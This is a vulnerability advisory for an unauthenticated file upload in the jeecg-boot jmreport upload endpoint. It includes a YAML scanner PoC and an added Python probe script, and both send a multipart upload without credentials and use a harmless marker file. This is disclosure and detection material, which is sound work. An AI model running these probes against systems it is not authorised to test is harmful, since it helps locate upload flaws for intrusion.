jeecg-boot-jmreport-upload: arbitrary file upload via the jeecg-boot-jmreport upload endpoint

Date: 2025-09-01 | Affected software: jeecg-boot-jmreport | PoC: public

Vulnerability description

The /jeecg-boot/jmreport/upload endpoint accepts arbitrary file uploads without authentication. In testing, the upload request itself needed no credentials, but retrieving the uploaded file afterwards required a logged-in session, i.e. a valid token had to be sent with the request. (The PoC below uses the path /jmreport/upload; prefix it with the application's context path, /jeecg-boot in the tested deployment.)

PoC code [public]

id: jeecg-boot-jmreport-upload

info:
  name: arbitrary file upload via the jeecg-boot-jmreport upload endpoint
  author: free2e
  severity: high
  verified: true
  description: |-
    The /jeecg-boot/jmreport/upload endpoint accepts arbitrary file uploads without authentication. In testing the upload needed no credentials, but accessing the uploaded file required login, i.e. a valid token.
  affected: jeecg-boot-jmreport upload endpoint
  solutions: none
  reference:
  tags: jeecgboot,jmreport,积木报表,file-upload

rules:
  r0:
    request:
      method: POST
      path: /jmreport/upload
      headers:
        Content-Type: multipart/form-data; boundary=------WebKitFormBoundary{{rboundary}}
      body: "\
        ------WebKitFormBoundary{{rboundary}}\r\n\
        Content-Disposition: form-data; name=\"file\"; filename=\"aaa.txt\"\r\n\
        Content-Type: text/html\r\n\
        \r\n\
        test123456\r\n\
        ------WebKitFormBoundary{{rboundary}}\r\n\
        Content-Disposition: form-data; name=\"fileName\"\r\n\
        \r\n\
        aaa.txt\r\n\
        ------WebKitFormBoundary{{rboundary}}\r\n\
        Content-Disposition: form-data; name=\"biz\"\r\n\
        \r\n\
        excel_online\r\n\
        ------WebKitFormBoundary{{rboundary}}--\r\n\
        "
    expression: response.status == 200 && response.body.bcontains(b'"jimureport"')
expression: r0()
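The same probe as a stand-alone script, added here as a worked example; it is not part of the page's PoC or of the jeecg-boot project. It builds the three-part multipart body the YAML sends (file, fileName, biz=excel_online), posts it with no token, and applies the PoC's own success condition (HTTP 200 and the literal "jimureport" in the body). Assumptions: the application is reachable under the /jeecg-boot context path named in the description, and the delimiter lines are written as "--" followed by the boundary parameter, the form RFC 2046 specifies (the YAML above uses the same dash count in the Content-Type header and the body, so if a target rejects the body, compare the two). The host, port and boundary string are placeholders.

```python
import http.client
import secrets
import sys

# Values taken from the page's PoC; the file content is a harmless marker.
UPLOAD_PATH = "/jmreport/upload"
BIZ = "excel_online"


def build_multipart(boundary: str, filename: str, content: bytes, biz: str = BIZ):
    """Build the body the PoC sends: parts 'file', 'fileName' and 'biz'.

    Returns (content_type_header_value, body_bytes). Each delimiter line is
    "--" + boundary and the closing delimiter is "--" + boundary + "--",
    as RFC 2046 requires.
    """
    delim = b"--" + boundary.encode()
    fname = filename.encode()
    parts = [
        delim + b"\r\n"
        + b'Content-Disposition: form-data; name="file"; filename="' + fname + b'"\r\n'
        + b"Content-Type: text/html\r\n\r\n" + content + b"\r\n",
        delim + b"\r\n"
        + b'Content-Disposition: form-data; name="fileName"\r\n\r\n' + fname + b"\r\n",
        delim + b"\r\n"
        + b'Content-Disposition: form-data; name="biz"\r\n\r\n' + biz.encode() + b"\r\n",
    ]
    body = b"".join(parts) + delim + b"--\r\n"
    return f"multipart/form-data; boundary={boundary}", body


def matches_poc(status: int, body: bytes) -> bool:
    """The PoC's expression: status 200 and the quoted string "jimureport" in the body."""
    return status == 200 and b'"jimureport"' in body


def send_upload(host: str, port: int = 80, use_tls: bool = False,
                context_path: str = "/jeecg-boot", timeout: float = 10.0) -> dict:
    """POST the upload with no authentication header and report the outcome.

    context_path is an assumption (the description shows /jeecg-boot); pass ""
    if the application is deployed at the server root.
    """
    boundary = "----WebKitFormBoundary" + secrets.token_hex(8)  # random, like {{rboundary}}
    ctype, body = build_multipart(boundary, "aaa.txt", b"test123456")
    conn_cls = http.client.HTTPSConnection if use_tls else http.client.HTTPConnection
    conn = conn_cls(host, port, timeout=timeout)
    try:
        # Deliberately no X-Access-Token / cookie: the point is that the upload
        # is accepted without one.
        conn.request("POST", context_path.rstrip("/") + UPLOAD_PATH, body=body,
                     headers={"Content-Type": ctype, "Content-Length": str(len(body))})
        resp = conn.getresponse()
        data = resp.read()
    finally:
        conn.close()
    return {"status": resp.status, "body": data, "matched": matches_poc(resp.status, data)}


if __name__ == "__main__":
    # Usage: python probe.py <host> [port] [tls:0|1]
    target_host = sys.argv[1] if len(sys.argv) > 1 else "127.0.0.1"
    target_port = int(sys.argv[2]) if len(sys.argv) > 2 else 8080
    tls = len(sys.argv) > 3 and sys.argv[3] == "1"
    result = send_upload(target_host, target_port, use_tls=tls)
    print(result["status"], "matched" if result["matched"] else "no match")
    print(result["body"][:300])
```

A "matched" result only confirms what the page describes: the endpoint stored the file without credentials. Whether the stored file is reachable anonymously is a separate check; the page reports that fetching it required a logged-in token, so a match here is not by itself proof of an unauthenticated write-then-read path.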
